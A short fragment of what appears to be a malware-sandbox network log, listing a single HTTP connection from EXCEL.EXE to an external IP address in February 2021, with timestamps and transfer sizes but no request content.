HTTP Request Dependency Graph |
---|
HTTP Packets |
---|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49165 | 185.81.0.78 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Feb 20, 2021 02:16:43.753083944 CET | 0 | OUT | |
Feb 20, 2021 02:16:43.822292089 CET | 2 | IN |